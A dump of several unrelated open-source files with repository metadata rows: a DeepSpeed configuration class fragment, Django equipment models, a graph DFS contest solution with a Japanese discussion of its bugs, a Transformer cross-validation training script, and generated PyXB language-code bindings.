self.zero_enabled = self.zero_optimization_stage > 0
self.activation_checkpointing_config = DeepSpeedActivationCheckpointingConfig(
param_dict)
self.gradient_clipping = get_gradient_clipping(param_dict)
self.fp16_enabled = get_fp16_enabled(param_dict)
self.amp_enabled = get_amp_enabled(param_dict)
self.amp_params = get_amp_params(param_dict)
self.loss_scale = get_loss_scale(param_dict)
self.initial_dynamic_scale = get_initial_dynamic_scale(param_dict)
self.dynamic_loss_scale_args = get_dynamic_loss_scale_args(param_dict)
self.optimizer_name = get_optimizer_name(param_dict)
if self.optimizer_name is not None and \
self.optimizer_name.lower() in DEEPSPEED_OPTIMIZERS:
self.optimizer_name = self.optimizer_name.lower()
self.optimizer_params = get_optimizer_params(param_dict)
self.optimizer_legacy_fusion = get_optimizer_legacy_fusion(param_dict)
self.zero_allow_untested_optimizer = get_zero_allow_untested_optimizer(
param_dict)
self.scheduler_name = get_scheduler_name(param_dict)
self.scheduler_params = get_scheduler_params(param_dict)
self.wall_clock_breakdown = get_wall_clock_breakdown(param_dict)
self.memory_breakdown = get_memory_breakdown(param_dict)
self.tensorboard_enabled = get_tensorboard_enabled(param_dict)
self.tensorboard_output_path = get_tensorboard_output_path(param_dict)
self.tensorboard_job_name = get_tensorboard_job_name(param_dict)
self.sparse_attention = get_sparse_attention(param_dict)
def _batch_assertion(self):
train_batch = self.train_batch_size
micro_batch = self.train_micro_batch_size_per_gpu
grad_acc = self.gradient_accumulation_steps
assert train_batch > 0, \
f'Train batch size: {train_batch} has to be greater than 0'
assert micro_batch > 0, \
f'Micro batch size per gpu: {micro_batch} has to be greater than 0'
assert grad_acc > 0, \
f'Gradient accumulation steps: {grad_acc} has to be greater than 0'
assert train_batch == micro_batch * grad_acc * self.world_size, \
(f'Check batch related parameters. train_batch_size is not equal'
' to micro_batch_per_gpu * gradient_acc_step * world_size'
f'{train_batch} != {micro_batch} * {grad_acc} * {self.world_size}')
def _set_batch_related_parameters(self):
train_batch = self.train_batch_size
micro_batch = self.train_micro_batch_size_per_gpu
grad_acc = self.gradient_accumulation_steps
#all values are provided nothing needs to be set
if train_batch is not None and \
micro_batch is not None and \
grad_acc is not None:
return
#global_accumulation_steps needs to be set
elif train_batch is not None and \
micro_batch is not None:
grad_acc = train_batch // micro_batch
grad_acc //= self.world_size
self.gradient_accumulation_steps = grad_acc
#micro_batch_per_gpu needs to be set
elif train_batch is not None and \
grad_acc is not None:
micro_batch = train_batch // self.world_size
micro_batch //= grad_acc
self.train_micro_batch_size_per_gpu = micro_batch
#train_batch_size needs to be set
elif micro_batch is not None and \
grad_acc is not None:
train_batch_size = micro_batch * grad_acc
train_batch_size *= self.world_size
self.train_batch_size = train_batch_size
#gradient_accumulation_steps and micro_batch_per_gpus is set
elif train_batch is not None:
self.gradient_accumulation_steps = 1
self.train_micro_batch_size_per_gpu = train_batch // self.world_size
#train_batch_size and gradient_accumulation_step is set
elif micro_batch is not None:
self.train_batch_size = micro_batch * self.world_size
self.gradient_accumulation_steps = 1
#either none of the three parameters are provided or just gradient_accumulation_step is provided
else:
assert False, \
'Either train_batch_size or micro_batch_per_gpu needs to be provided'
logger.info(
f' After Train batch {self.train_batch_size} micro_batch {self.train_micro_batch_size_per_gpu} and grad_acc {self.gradient_accumulation_steps}'
)
def _configure_train_batch_size(self):
self._set_batch_related_parameters()
self._batch_assertion()
def _do_sanity_check(self):
self._do_error_check()
self._do_warning_check()
def print(self, name):
logger.info('{}:'.format(name))
for arg in sorted(vars(self)):
if arg != '_param_dict':
dots = '.' * (29 - len(arg))
logger.info(' {} {} {}'.format(arg, dots, getattr(self, arg)))
logger.info(' json = {}'.format(
json.dumps(self._param_dict,
sort_keys=True,
indent=4,
separators=(',',
':'))))
def _do_error_check(self):
if self.zero_enabled:
assert self.fp16_enabled, "DeepSpeedConfig: ZeRO is only supported if fp16 is enabled"
assert self.zero_optimization_stage <= MAX_STAGE_ZERO_OPTIMIZATION, "DeepSpeedConfig: Maximum supported ZeRO stage is {}".format(MAX_STAGE_ZERO_OPTIMIZATION)
assert self.train_micro_batch_size_per_gpu, "DeepSpeedConfig: {} is not defined".format(TRAIN_MICRO_BATCH_SIZE_PER_GPU)
assert self.gradient_accumulation_steps, 'DeepSpeedConfig: {} is not defined'.format(
GRADIENT_ACCUMULATION_STEPS)
def _do_warning_check(self):
fp16_enabled = self.fp16_enabled or self.zero_enabled
vocabulary_size = self._param_dict.get(VOCABULARY_SIZE, VOCABULARY_SIZE_DEFAULT)
if vocabulary_size and vocabulary_size % TENSOR_CORE_ALIGN_SIZE != 0:
logger.warning(
"DeepSpeedConfig: vocabulary size {} is not aligned to {}, may import tensor core utilization."
.format(vocabulary_size,
TENSOR_CORE_ALIGN_SIZE))
if self.optimizer_params is not None and \
MAX_GRAD_NORM in self.optimizer_params.keys() and \
self.optimizer_params[MAX_GRAD_NORM] > 0:
if fp16_enabled:
logger.warning(
'DeepSpeedConfig: In FP16 mode, DeepSpeed will pass {}:{} to FP16 wrapper'
.format(MAX_GRAD_NORM,
self.optimizer_params[MAX_GRAD_NORM]))
else:
logger.warning(
'DeepSpeedConfig: In FP32 mode, DeepSpeed does not permit MAX_GRAD_NORM ({}) > 0, setting to zero'
.format(self.optimizer_params[MAX_GRAD_NORM]))
self.optimizer_params[MAX_GRAD_NORM] = 0.0
| [
"noreply@github.com"
] | tanghl1994.noreply@github.com |
4f8338dcfaaea8812c3f208254835374ac488f08 | 0de12c35f8a187b40ae7da824d0fe5dd608f6a17 | /Equipment/models.py | 889c705bf7b958771b246e119e4697e5044aaa0f | [] | no_license | AKoushikReddy/Django-WebApplication-2 | 3a59acb7639c630e7ea851616ad1427b69e3f44b | 079155622c3d41ba1faa63b92213d7f7a4a9eeb2 | refs/heads/master | 2020-04-08T02:06:33.510495 | 2018-11-24T10:13:06 | 2018-11-24T10:13:06 | 158,922,817 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 885 | py | from django.db import models
from accounts.models import UserHouse
# Create your models here.
class Camera(models.Model):
id = models.IntegerField(primary_key=True)
house = models.ForeignKey(UserHouse, on_delete=models.CASCADE)
condition = models.TextField(max_length=30, default='Not Installed')
cammodel = models.CharField(max_length=10, default='IP Camera')
def __str__(self):
return str(self.house) + "\'s camera " + str(self.id) + ":id"
class SensorAlarm(models.Model):
id = models.IntegerField(primary_key=True)
house = models.ForeignKey(UserHouse, on_delete=models.CASCADE)
condition = models.TextField(max_length=30, default='Not Installed')
alarmtype = models.CharField(max_length=10, default='PIR Sensors')
def __str__(self):
return str(self.house) + "\'s sensor " + str(self.id) + ":id"
| [
"noreply@github.com"
] | AKoushikReddy.noreply@github.com |
c3a9262abc44ac5508726e238bdcacc3f8454599 | 24cee07743790afde5040c38ef95bb940451e2f6 | /acode/abc284/e/update.py | cbe323dede2e63602d87336c493cc58525a7c3eb | [] | no_license | tinaba96/coding | fe903fb8740d115cf5a7f4ff5af73c7d16b9bce1 | d999bf5620e52fabce4e564c73b9f186e493b070 | refs/heads/master | 2023-09-01T02:24:33.476364 | 2023-08-30T15:01:47 | 2023-08-30T15:01:47 | 227,594,153 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,006 | py | import sys
sys.setrecursionlimit(500005)
#sys.setrecursionlimit(10**9)
#import pypyjit # this is for solving slow issue for pypy when using recursion but python will not need this (test will fail but submit works)
#pypyjit.set_param('max_unroll_recursion=-1')
N, M = list(map(int, input().split()))
mp = [[] for n in range(N+1)]
for i in range(M):
u, v = list(map(int, input().split()))
mp[u].append(v)
mp[v].append(u)
al = set()
cnt = 0
def dfs(p, e):
global cnt
if p not in al:
al.add(p)
cnt += 1
if len(al) > 10**6:
print(10**6)
exit()
for n in mp[e]:
if str(n) in p:
continue
dfs(p+str(n), n)
return
dfs('1', 1)
print(cnt)
# WA: 全探索ができていない?
# TLE: len(al)やstr(n) in p に時間を要している? それともpythonの再帰だから? -> len(al) is O(1), str(n) in p is almopst O(NlogN) (this is the cause of TLE)
# len(al) can costs almost 10**6 specially at the end. -> this is wrong see below
# str(n) in p costs O(len(p)) which is O(N) at maximum -> almost O(NlogN)
'''
ask question in LINE
ME
ABC284Eなのですが、このように実装して提出した結果、AC: 21 WA: 9 TLE: 3というような結果になってしまいました。
TLEになる原因は、len(al)やstr(n) in p だと思うのですが、WAになる原因が分かりません。パスを文字列として、setに格納していく実装なのですが、WAの原因分かる方いらっしゃいますでしょうか。
answer1
p = '1'+'2'のときに12も行ったことになるとか?
path graph (一直線のグラフ)だとalに入る文字数がO(n^2)になって大変なことになりませんか
ME
そうですね!確かにこれだと0-9までの頂点しか機能しないですね!
ありがとうございます!
ans2
dfs(p+‘$’+str(n), n)
とかってしたらこの問題は解決できそうですね
ME
al.add(p)のpの(文字列の)長さlen(p)がO(n^2)なるということでしょうか。(for ans1)
確かに頭に文字列をつければ、探索する際も特定できますね!ありがとうございます!(for ans2)
ans1
alに入っている文字列の合計の長さです
単純グラフなので、DFSする限りでは毎回必ず違ったpになるので、個数だけ管理しておけばよいです
ME
確かにそうなりますね!気づきませんでした、、
これは単純にメモリ制限的に引っかかるという考え方で良いのでしょうか。
勉強になります!
ans1
基本的にそのはず…賢い言語実装だとメモリ節約してくれるのもあった気がしますが
ME
ありがとうございます!
ちなみに、dfsの部分はO(N+M)だと思っているのですが、
それに加え、len(al)やstr(n) in p の部分がさらにO(N)かかり、全体的にO(N(N+M))ではないかと考えたのですが、考え方はあっているのでしょうか。
len(al)やstr(n) in pの部分はそれぞれalとpの長さの分計算コストかかると思っているのですが、それぞれの長さがNくらいになるのは最後の方だけだと思います。全体としてO(N(N+M)と考えて良いのでしょうか。
len(al)やstr(n) in pの部分は、ならし計算量でもO(1)にならないと思うので、ならし計算量でO(1)にならなければ、O(N)と考えれば良いのでしょうか?
asn3
(余計なお世話かもしれませんがnを文字列で表した時の長さはO(log n)なのでalに含まれる文字列の長さの合計にもlogが付くと思います)
ans4
len は定数時間じゃないですか?
ME
ありがとうございます!
これは、グラフの分岐があるためlogがつくということでしょうか。
一直線のグラフなどの最悪ケースでO(n^2)になるという理解で良いでしょうか? (for ans3)
pythonは長さを別で用意していて、len()はO(1)のようでした。
ご指摘ありがとうございます!(for ans4)
ans3
nを文字列で表そうとすると、その桁数分の文字が必要で、その桁数というのがO(log n)なので文字列の長さ、つまり文字の個数の合計にlogが付くという話です
例えば1や3は1桁なので1文字で良いですが、100000は6桁なので6文字必要です
ans5
その問題、再帰関数を用いたdfsが一般的だと思うのですが、スタックを用いたdfs で実装するのは厳しそうですかね?
ME
そういうことですね!理解できました。ありがとうございます!(for ans3)
となると、TLEの原因はstr(n) in pの部分でpの長さ分コストがかかるという理解で良いのでしょうか。pは最大N回文字列が足され、それぞれ足される文字列の長さがO(logN)と考えるとpの長さは O (NlogN)という感じでしょうか。
実装まではしていないのですが、pythonの再帰処理が苦手であることを考えるとスタックによる実装の方が早くなるとは思います。
ただこれがTLEの原因なのでしょうか。それとも上記のstr(n) in pがボトルネックになっているのでしょうか。(for ans5)
ans3
正しいと思います
TLEの原因がこれで、もしTLが無限であった場合今度はalのメモリが原因でMLEになると思います
ans4
+str(n) も PyPy だと遅そうなのと、なんか "123" か 1 → 2 → 3 なのか 1 → 23 なのかの曖昧性があって壊れませんか?
後者が WA になってそうで、例えば
1 → 23 → 2 のときに、2 が踏めないと判断されそうです
あ、既に指摘されてましたごめんなさい
ME
ありがとうございます!非常に納得がいき、勉強になりました!(for ans3)
いえいえ!ありがとうございます!
具体例も非常に勉強になりました!(for ans4)
'''
| [
"tinaba178.96@gmail.com"
] | tinaba178.96@gmail.com |
ac3a3c48593301707e1581d20e629c1345302ee1 | a3d9884beae30f62ef1247e1ef09bfecc8f79eea | /gna/api.py | 89f33df7eaadd6bee238992639a810d4a71d308a | [] | no_license | sean2009/gm_web_analyze | f0f107d08987124edd3e909b96012b89728e03f0 | 470900c30b4bd61c959ace5a1b76164a837e9b58 | refs/heads/master | 2016-09-06T17:05:01.939995 | 2014-09-28T07:32:18 | 2014-09-28T07:32:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,126 | py | # -*- coding: utf-8 -*-
from django.conf import settings
import datetime
from gna.common import (
get_retention_cache_key,
get_month_cache_key,
)
from gna.gna_normal.models import (
Player,
DailyAccessLog,
PaymentInfo,
)
from gna.cache import (
daily_cache,
simple_cache,
delta_cache,
daily_flag_cache,
)
def _get_month_cache(db, key, date):
cache_key = get_month_cache_key(key, date)
cache = simple_cache().get(db, cache_key)
if cache:
return cache['value']
else:
return None
def _get_date_str(date):
if type(date)==datetime.date or type(date)==datetime.datetime:
return date.strftime('%Y-%m-%d')
return date
def _get_str_by_int(value):
if value != None:
return str(int(float(value)))
else:
return None
def _get_str_by_float(value):
if value != None:
return '%.1f' % (float(value))
else:
return None
def _get_percent_by_float(value):
if value != None:
return '%.1f%%' % (float(value)*100.0)
else:
return None
# GNA Daily
class GNAObject(object):
income = None
dau = None
arpu = None
arppu = None
pay_user = None
pay_ratio = None
first_pay_user = None
first_pay_ratio = None
register_user = None
def __init__(self, db, date):
self.db = db
self.date = date
def get_str(self):
self.date_str = _get_date_str(self.date)
self.income_str = _get_str_by_int(self.income)
self.dau_str = _get_str_by_int(self.dau)
self.arpu_str = _get_str_by_float(self.arpu)
self.arppu_str = _get_str_by_float(self.arppu)
self.pay_user_str = _get_str_by_int(self.pay_user)
self.pay_ratio_str = _get_percent_by_float(self.pay_ratio)
self.first_pay_user_str = _get_str_by_int(self.first_pay_user)
self.first_pay_ratio_str = _get_percent_by_float(self.first_pay_ratio)
self.register_user_str = _get_str_by_int(self.register_user)
def get_gna_objs_list(db, from_date, to_date):
income_data = daily_cache().get_by_date_range(db, 'income', from_date, to_date)
dau_data = daily_cache().get_by_date_range(db, 'dau', from_date, to_date)
arpu_data = daily_cache().get_by_date_range(db, 'arpu', from_date, to_date)
arppu_data = daily_cache().get_by_date_range(db, 'arppu', from_date, to_date)
pay_user_data = daily_cache().get_by_date_range(db, 'pay_user', from_date, to_date)
pay_ratio_data = daily_cache().get_by_date_range(db, 'pay_ratio', from_date, to_date)
first_pay_user_data = daily_cache().get_by_date_range(db, 'first_pay_user', from_date, to_date)
first_pay_ratio_data = daily_cache().get_by_date_range(db, 'first_pay_ratio', from_date, to_date)
register_user_data = daily_cache().get_by_date_range(db, 'register_user', from_date, to_date)
objs = []
obj_dict = {}
for i in range((to_date - from_date).days + 1):
date = from_date + datetime.timedelta(days=i)
obj = GNAObject(db, date)
obj_dict[date] = obj
objs.append(obj)
objs.reverse()
for data in income_data:
date, value = data['date'], data['value']
obj_dict[date].income = value
for data in dau_data:
date, value = data['date'], data['value']
obj_dict[date].dau = value
for data in arpu_data:
date, value = data['date'], data['value']
obj_dict[date].arpu = value
for data in arppu_data:
date, value = data['date'], data['value']
obj_dict[date].arppu = value
for data in pay_user_data:
date, value = data['date'], data['value']
obj_dict[date].pay_user = value
for data in pay_ratio_data:
date, value = data['date'], data['value']
obj_dict[date].pay_ratio = value
for data in first_pay_user_data:
date, value = data['date'], data['value']
obj_dict[date].first_pay_user = value
for data in first_pay_ratio_data:
date, value = data['date'], data['value']
obj_dict[date].first_pay_ratio = value
for data in register_user_data:
date, value = data['date'], data['value']
obj_dict[date].register_user = value
for obj in objs:
obj.get_str()
return objs
# GNA Month
def get_gna_month_obj(db, date):
obj = GNAObject(db, date)
obj.income = float(_get_month_cache(db, 'income', date))
obj.dau = float(_get_month_cache(db, 'dau', date))
obj.arpu = float(_get_month_cache(db, 'arpu', date))
obj.arppu = float(_get_month_cache(db, 'arppu', date))
obj.pay_ratio = float(_get_month_cache(db, 'pay_ratio', date))
obj.pay_user = float(_get_month_cache(db, 'pay_user', date))
obj.first_pay_user = float(_get_month_cache(db, 'first_pay_user', date))
obj.first_pay_ratio = float(_get_month_cache(db, 'first_pay_ratio', date))
obj.register_user = float(_get_month_cache(db, 'register_user', date))
obj.get_str()
return obj
# Retention Daily
class RetentionObject(object):
retention_ratio1_str = None
retention_ratio2_str = None
retention_ratio3_str = None
retention_ratio4_str = None
retention_ratio5_str = None
retention_ratio6_str = None
retention_ratio7_str = None
retention_ratio14_str = None
retention_ratio30_str = None
retention_ratio60_str = None
retention_ratio90_str = None
def __init__(self, db, date):
self.db = db
self.date = date
self.date_str = _get_date_str(self.date)
def get_retention_ratio_daily_objs_list(db, from_date, to_date):
days_list = settings.GNA_RETENTION_DAYS_LIST
objs = []
obj_dict = {}
for i in range((to_date - from_date).days + 1):
date = from_date + datetime.timedelta(days=i)
obj = RetentionObject(db, date)
obj_dict[date] = obj
objs.append(obj)
objs.reverse()
for days in days_list:
cache_key = get_retention_cache_key('retention_ratio', days)
cache_data = daily_cache().get_by_date_range(db, cache_key, from_date, to_date)
for data in cache_data:
date, value = data['date'], data['value']
obj = obj_dict[date]
setattr(obj, 'retention_ratio%d_str'%days, value)
return objs
def get_retention_ratio_daily_objs_list_2(db, from_date, to_date):
days_list = settings.GNA_RETENTION_DAYS_LIST
objs = []
obj_dict = {}
for i in range((to_date - from_date).days + 1):
date = from_date + datetime.timedelta(days=i)
obj = RetentionObject(db, date)
obj_dict[date] = obj
objs.append(obj)
objs.reverse()
for days in days_list:
cache_key = get_retention_cache_key('retention_ratio', days)
cache_data = daily_cache().get_by_date_range(db, cache_key, from_date+datetime.timedelta(days=days), to_date+datetime.timedelta(days=days))
for data in cache_data:
date, value = data['date']-datetime.timedelta(days=days), data['value']
obj = obj_dict[date]
setattr(obj, 'retention_ratio%d_str'%days, value)
return objs
| [
"peng.xiao@gumichina.com"
] | peng.xiao@gumichina.com |
c661730f7f3d3c2b70f65f28e85c421558db8d73 | 87a8f7aa17ca00a09b07db179cfc3db5ac114861 | /train_cross.py | d4146ec5762316ee5cbd05c12bed1ae2b989d533 | [
"MIT"
] | permissive | boji123/attention-is-all-you-need-pytorch | 711b57a076aa14555e7be6678a7bd71eb6563079 | fec848eacab494fd181d894d81efe8f8fac83046 | refs/heads/master | 2020-03-27T10:10:29.290897 | 2018-08-28T06:33:01 | 2018-08-28T06:33:01 | 141,121,040 | 0 | 0 | MIT | 2018-07-16T10:02:51 | 2018-07-16T10:02:50 | null | UTF-8 | Python | false | false | 9,879 | py | '''
This script handling the training process.
'''
import argparse
import math
import time
import sys
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
import transformer.Constants as Constants
from transformer.Models import Transformer
from transformer.Optim import ScheduledOptim
from DataLoader import DataLoader
from DataLoader import Cross_Validation_Datahandler
from torch.nn import DataParallel
def get_performance(crit, pred, gold, smoothing=False, num_class=None):
''' Apply label smoothing if needed '''
# TODO: Add smoothing
if smoothing:
assert bool(num_class)
eps = 0.1
gold = gold * (1 - eps) + (1 - gold) * eps / num_class
raise NotImplementedError
loss = crit(pred, gold.contiguous().view(-1))
pred = pred.max(1)[1]
gold = gold.contiguous().view(-1)
n_correct = pred.data.eq(gold.data)
n_correct = n_correct.masked_select(gold.ne(Constants.PAD).data).sum()
return loss, n_correct
def train_epoch(model, training_data, crit, optimizer):
''' Epoch operation in training phase'''
model.train()
total_loss = 0
n_total_words = 0
n_total_correct = 0
for batch in tqdm(
training_data, mininterval=2,
desc=' - (Training) ', leave=False):
# prepare data
src, tgt = batch
gold = tgt[0][:, 1:]
# forward
optimizer.zero_grad()
pred = model(src, tgt)
# backward
loss, n_correct = get_performance(crit, pred, gold)
loss.backward()
# update parameters
optimizer.step()
optimizer.update_learning_rate()
# note keeping
n_words = gold.data.ne(Constants.PAD).sum()
n_total_words += n_words
n_total_correct += n_correct
total_loss += loss.data[0]
return total_loss/n_total_words, n_total_correct/n_total_words
def eval_epoch(model, validation_data, crit):
''' Epoch operation in evaluation phase '''
model.eval()
total_loss = 0
n_total_words = 0
n_total_correct = 0
for batch in tqdm(
validation_data, mininterval=2,
desc=' - (Validation) ', leave=False):
# prepare data
src, tgt = batch
gold = tgt[0][:, 1:]
# forward
pred = model(src, tgt)
loss, n_correct = get_performance(crit, pred, gold)
# note keeping
n_words = gold.data.ne(Constants.PAD).sum()
n_total_words += n_words
n_total_correct += n_correct
total_loss += loss.data[0]
return total_loss/n_total_words, n_total_correct/n_total_words
def train(model, datahandler, crit, optimizer, opt):
''' Start training '''
log_train_file = None
log_valid_file = None
if opt.log:
log_train_file = opt.log + '.train.log'
log_valid_file = opt.log + '.valid.log'
print('[Info] Training performance will be written to file: {} and {}'.format(
log_train_file, log_valid_file))
with open(log_train_file, 'w') as log_tf, open(log_valid_file, 'w') as log_vf:
log_tf.write('epoch,loss,ppl,accuracy\n')
log_vf.write('epoch,loss,ppl,accuracy\n')
valid_accus = []
for epoch_i in range(opt.epoch):
print('[ Epoch', epoch_i, ']')
training_data, validation_data = datahandler.load_data(epoch_i)
start = time.time()
train_loss, train_accu = train_epoch(model, training_data, crit, optimizer)
print(' - (Training) ppl: {ppl: 8.5f}, accuracy: {accu:3.3f} %, '\
'elapse: {elapse:3.3f} min'.format(
ppl=math.exp(min(train_loss, 100)), accu=100*train_accu,
elapse=(time.time()-start)/60))
start = time.time()
valid_loss, valid_accu = eval_epoch(model, validation_data, crit)
print(' - (Validation) ppl: {ppl: 8.5f}, accuracy: {accu:3.3f} %, '\
'elapse: {elapse:3.3f} min'.format(
ppl=math.exp(min(valid_loss, 100)), accu=100*valid_accu,
elapse=(time.time()-start)/60))
valid_accus += [valid_accu]
model_state_dict = model.state_dict()
checkpoint = {
'model': model_state_dict,
'settings': opt,
'epoch': epoch_i}
if opt.save_model:
if opt.save_mode == 'all':
model_name = opt.save_model + '_accu_{accu:3.3f}.chkpt'.format(accu=100*valid_accu)
torch.save(checkpoint, model_name)
elif opt.save_mode == 'best':
model_name = opt.save_model + '.chkpt'
if valid_accu >= max(valid_accus):
torch.save(checkpoint, model_name)
print(' - [Info] The checkpoint file has been updated.')
if log_train_file and log_valid_file:
with open(log_train_file, 'a') as log_tf, open(log_valid_file, 'a') as log_vf:
log_tf.write('{epoch},{loss: 8.5f},{ppl: 8.5f},{accu:3.3f}\n'.format(
epoch=epoch_i, loss=train_loss,
ppl=math.exp(min(train_loss, 100)), accu=100*train_accu))
log_vf.write('{epoch},{loss: 8.5f},{ppl: 8.5f},{accu:3.3f}\n'.format(
epoch=epoch_i, loss=valid_loss,
ppl=math.exp(min(valid_loss, 100)), accu=100*valid_accu))
def main():
''' Main function '''
parser = argparse.ArgumentParser()
parser.add_argument('-data', required=True)
parser.add_argument('-gpu_device_ids', type=str, default='0')
parser.add_argument('-init_model', type=str, default=None)
parser.add_argument('-use_pretrained_encoder', action='store_true')
parser.add_argument('-epoch', type=int, default=10)
parser.add_argument('-batch_size', type=int, default=32)
#parser.add_argument('-d_word_vec', type=int, default=512)
parser.add_argument('-d_model', type=int, default=512)
parser.add_argument('-d_inner_hid', type=int, default=1024)
parser.add_argument('-d_k', type=int, default=64)
parser.add_argument('-d_v', type=int, default=64)
parser.add_argument('-n_head', type=int, default=8)
parser.add_argument('-n_layers', type=int, default=6)
parser.add_argument('-n_warmup_steps', type=int, default=4000)
parser.add_argument('-dropout', type=float, default=0.1)
parser.add_argument('-embs_share_weight', action='store_true')
parser.add_argument('-proj_share_weight', action='store_true')
parser.add_argument('-log', default=None)
parser.add_argument('-save_model', default=None)
parser.add_argument('-save_mode', type=str, choices=['all', 'best'], default='best')
parser.add_argument('-no_cuda', action='store_true')
opt = parser.parse_args()
opt.cuda = not opt.no_cuda
opt.d_word_vec = opt.d_model
opt.gpu_device_ids = [ int(i) for i in opt.gpu_device_ids.split(',')]
#print(opt.gpu_device_ids)
#exit(0)
#========= Loading Dataset =========#
data = torch.load(opt.data)
data['data']={}
data['data']['src'] = data['train']['src'] + data['valid']['src']
data['data']['tgt'] = data['train']['tgt'] + data['valid']['tgt']
opt.src_vocab_size = len(data['dict']['src'])
opt.tgt_vocab_size = len(data['dict']['tgt'])
opt.max_token_seq_len = data['settings'].max_token_seq_len
corss_num_k = 10
datahandler = Cross_Validation_Datahandler(data, opt, corss_num_k)
#========= Preparing Model =========#
print(opt)
if opt.init_model:
checkpoint = torch.load(opt.init_model)
model_opt = checkpoint['settings']
transformer = Transformer(
model_opt.src_vocab_size,
model_opt.tgt_vocab_size,
model_opt.max_token_seq_len,
proj_share_weight=model_opt.proj_share_weight,
embs_share_weight=model_opt.embs_share_weight,
d_k=model_opt.d_k,
d_v=model_opt.d_v,
d_model=model_opt.d_model,
d_word_vec=model_opt.d_word_vec,
d_inner_hid=model_opt.d_inner_hid,
n_layers=model_opt.n_layers,
n_head=model_opt.n_head,
dropout=model_opt.dropout)
transformer.load_state_dict(checkpoint['model'])
init_epoch = checkpoint['epoch']
print('[Info] Trained model state loaded.')
sys.stdout.flush()
if opt.use_pretrained_encoder:
for param in transformer.encoder.parameters():
param.requires_grad = False
print('[Info] encoder parameter will keep constant during training')
else:
transformer = Transformer(
opt.src_vocab_size,
opt.tgt_vocab_size,
opt.max_token_seq_len,
proj_share_weight=opt.proj_share_weight,
embs_share_weight=opt.embs_share_weight,
d_k=opt.d_k,
d_v=opt.d_v,
d_model=opt.d_model,
d_word_vec=opt.d_word_vec,
d_inner_hid=opt.d_inner_hid,
n_layers=opt.n_layers,
n_head=opt.n_head,
dropout=opt.dropout)
#print(transformer)
optimizer = ScheduledOptim(
optim.Adam(
#transformer.get_trainable_parameters(),
filter(lambda p: p.requires_grad,transformer.get_trainable_parameters()),
betas=(0.9, 0.98), eps=1e-09),
opt.d_model, opt.n_warmup_steps)
def get_criterion(vocab_size):
''' With PAD token zero weight '''
weight = torch.ones(vocab_size)
weight[Constants.PAD] = 0
return nn.CrossEntropyLoss(weight, size_average=False)
crit = get_criterion(opt.tgt_vocab_size)
if opt.cuda:
transformer = transformer.cuda()
crit = crit.cuda()
train(transformer, datahandler, crit, optimizer, opt)
if __name__ == '__main__':
print('training start')
sys.stdout.flush()
main()
| [
"boji@aliyun.com"
] | boji@aliyun.com |
0ab7d42a20a3cab1ee17535c5ad991ea33d9fbaf | 51d4d53a03ff4aa2dea4b60991389ac95b3576bf | /ddexreader/ern312/_iso639a2.py | 326f6e5d08602f7bde02171d183e22510050716f | [
"MIT"
] | permissive | Trax-air/ddexreader | 05fda370d4a4dd251daa19a031c6dc4dc7a42f4b | 444811b3c0a4704691e8cd27ab3d9c580f23e177 | refs/heads/master | 2023-01-05T21:40:33.901586 | 2015-09-14T14:43:57 | 2015-09-14T14:43:57 | 38,633,547 | 28 | 15 | MIT | 2022-12-26T19:44:20 | 2015-07-06T17:08:40 | Python | UTF-8 | Python | false | false | 20,856 | py | # .\_iso639a2.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:72b0e0221aebdf4a98e2c5feefcc21990195dd91
# Generated 2015-08-12 15:54:17.335000 by PyXB version 1.2.4 using Python 2.7.0.final.0
# Namespace http://ddex.net/xml/20100121/iso639a2 [xmlns:iso639a2]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:9d0dcd70-40f9-11e5-9eef-b870f477ffbe')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://ddex.net/xml/20100121/iso639a2', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://ddex.net/xml/20100121/iso639a2}LanguageCode
class LanguageCode (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An ISO639-1 two-letter code representing a Language."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'LanguageCode')
_XSDLocation = pyxb.utils.utility.Location('http://ddex.net/xml/20100121/iso639a2.xsd', 3, 4)
_Documentation = 'An ISO639-1 two-letter code representing a Language.'
LanguageCode._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=LanguageCode, enum_prefix=None)
LanguageCode.aa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='aa', tag='aa')
